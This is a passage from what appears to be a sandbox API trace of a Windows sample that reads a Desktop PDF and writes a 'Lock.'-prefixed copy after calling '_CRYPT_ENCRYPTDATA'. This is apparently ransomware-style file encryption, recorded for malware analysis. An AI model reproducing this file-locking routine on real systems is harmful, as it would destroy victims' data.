lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0153.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0153.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0153.553] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0153.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0153.553] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0153.553] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0153.553] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0153.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0153.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0153.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0153.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0153.554] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/GUlu8dq_.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\gulu8dq_.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0153.554] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.554] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0153.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0153.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0153.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0153.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0153.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0153.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0153.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0153.555] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0153.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0153.555] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0153.555] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0153.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0153.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0153.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.555] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0153.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0153.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0153.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0153.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0153.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0153.557] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.GUlu8dq_.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.gulu8dq_.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0153.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0153.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0153.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0153.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0153.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0153.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0153.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0153.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0153.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0153.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0153.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0153.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0153.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0153.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0153.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0153.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0153.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3de5020 [0153.562] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0153.562] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0153.565] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x4106, lpOverlapped=0x0) returned 1 [0153.566] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0153.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0153.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14106) returned 0x2f14010 [0153.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de5020 | out: hHeap=0x970000) returned 1 [0153.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0153.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0153.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0153.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0153.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0153.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0153.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14106) returned 0x2f28120 [0153.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0153.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.625] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0153.625] TranslateMessage (lpMsg=0x8cf708) returned 0 [0153.625] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0153.625] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0153.625] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0153.626] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0153.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0153.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0153.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0153.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0153.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14106) returned 0x2f14010 [0153.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0153.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0153.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0153.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0153.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0153.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0153.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0153.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0153.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0153.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0153.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0153.629] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0153.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0153.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0153.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14106) returned 0x2f14010 [0153.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0153.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0153.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0153.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0153.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14106) returned 0x2e80330 [0153.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0153.634] 